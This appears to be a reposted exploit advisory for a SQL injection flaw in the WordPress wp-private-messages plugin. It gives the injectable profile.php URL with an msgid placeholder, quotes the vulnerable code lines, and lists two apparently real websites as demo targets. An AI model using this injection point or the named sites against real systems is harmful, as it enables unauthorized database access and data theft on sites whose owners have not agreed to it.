WordPress WP-Private-Messages SQL Injection

[Matt]

Description : WordPress WP-Private-Messages this party plugin suffers from a remote SQL injection vulnerability.

Author : IeDb

Source : WordPress WP-Private-Messages SQL Injection ? Packet Storm

Code :

The Wordpress wp-private-messages Plugin suffers from a Sql Injection vulnerability.



#################################

#                        Iranian Exploit DataBase

#                          Www.exploit.IrIsT.Ir

#################################

# Exploit Title : Wordpress wp-private-messages Plugin Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Home : http://exploit.IrIsT.Ir

# Software Link : http://wordpress.org/plugins/wp-private-messages/

# Security Risk : High

# Tested on : Linux

#################################

# Exploit :

# http://www.Site.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

# Dem0 :

# http://renewedculture.com/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

# http://www.rockfordravens.org/wp-admin/profile.php?page=wp-private-messages/wpu_private_messages.php&wpu=reply&msgid=[Sql]

#################################

# Vuln Source C0de : 

#  Lin 145 :

#  $messages = $wpdb->get_results("SELECT id, sender, subject, date, status FROM $wpdb->prefix".private_messages." WHERE rcpid = '".$current_user->ID."' AND tosee = 1 ORDER BY date DESC");

#  And Lin 160 :

#  echo "<a href=\"?page=".dirname(plugin_basename(__FILE__))."/wpu_private_messages.php&wpu=reply&msgid=".$message->id."\"><img src=\"". get_settings('siteurl') . "/wp-content/plugins/".dirname(plugin_basename(__FILE__))."/icons/reply.png\" alt=\"Reply!\" title=\"".__('Reply!', $wpulang)."\"></a>";

#################################

# Exploit Archive : http://exploit.irist.ir/exploits-148.html

#################################